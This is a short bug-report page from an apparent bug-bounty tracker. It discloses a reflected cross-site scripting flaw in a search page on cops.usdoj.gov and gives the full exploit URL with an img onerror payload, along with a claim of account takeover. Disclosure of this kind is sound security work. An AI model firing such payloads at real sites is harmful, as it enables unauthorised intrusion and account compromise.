Chat with BLT Bot

We reply immediately

Loading...

XSS in cops subdomain of US Department of Justice cops.usdoj.gov ,capable of User account takeover.

https://cops.usdoj.gov/RIC/ric.php?page=searchrez&cmd=1&pagenum=0&sort=title-LH&searchtext=fffffff%22--%3E%3Cimg%20src=X%20onerror=alert(%27XSS%27);document.write(%27FEBIN_PWNED%27);%3E


Tweet   GitHub Link  

Screenshots:

Event ID: 1137

User Profile Logo
Total Points = 320
User Profile Logo
febinrev
Total Points = 320
Bug Type: Security
Status: open
Added on: Aug. 28, 2020, 2:11 p.m.
Submitted: Independently
Domain Logo
Reported on usdoj.gov
Issues Reported: 1
Browser Image
Browser Version: 68.0
Operating System: Linux
OS Version: Unknown

Comments (0)

To comment, please sign in.
QR Code

v1.5